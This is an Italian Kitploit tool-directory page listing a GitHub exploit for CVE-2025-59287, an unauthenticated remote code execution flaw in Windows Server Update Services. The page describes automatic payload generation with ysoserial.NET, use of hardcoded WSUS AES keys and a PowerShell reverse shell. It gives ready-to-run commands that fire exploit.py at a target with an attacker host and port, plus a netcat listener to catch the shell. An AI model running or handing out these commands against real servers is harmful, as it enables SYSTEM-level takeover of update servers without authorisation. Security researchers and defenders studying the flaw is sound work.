Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59287 — # Exploit automatizzato per CVE-2025-59287, una RCE non autenticata in WSUS, con generazione di payload, listener per reverse shell e crittografia AES con chiavi hardcoded. | Kitploit
Strumenti/GitHubGitHub/garvitv14/cve-2025-59287
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

# Exploit automatizzato per CVE-2025-59287, una RCE non autenticata in WSUS, con generazione di payload, listener per reverse shell e crittografia AES con chiavi hardcoded.

Vedi Repository
1627711 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE CVE-2025-59287 per WSUS

Exploit automatizzato per la vulnerabilità di esecuzione remota di codice non autenticata in Windows Server Update Services (WSUS).

Dettagli della Vulnerabilità

  • ID CVE: CVE-2025-59287
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore di attacco: Rete
  • Autenticazione: Non richiesta
  • Impatto: Esecuzione remota di codice come SYSTEM

Funzionalità

✅ Generazione automatica del payload
✅ Download automatico della dipendenza ysoserial.NET
✅ Listener integrato per reverse shell
✅ Supporto multipiattaforma (Windows/Linux/Mac)
✅ Crittografia AES con chiavi hardcoded di WSUS
✅ Payload PowerShell per reverse shell

Requisiti

pip install -r requirements.txt

Dipendenze Python

Runtime .NET (Rilevamento automatico)

  • Windows: .NET Framework (integrato)
  • Linux/Mac: Wine o Mono Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

Installazione

Clona o scarica i file dell'exploit

cd CVE-2025-59287-exploit

Esegui l'exploit (scarica automaticamente ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

Utilizzo

Sfruttamento di Base

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

se si desidera una sessione su un altro listener

Terminale 1: Avvia il listener netcat

nc -lvnp 4444

Terminale 2: Esegui l'exploit senza listener integrato

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

Scarica lo strumento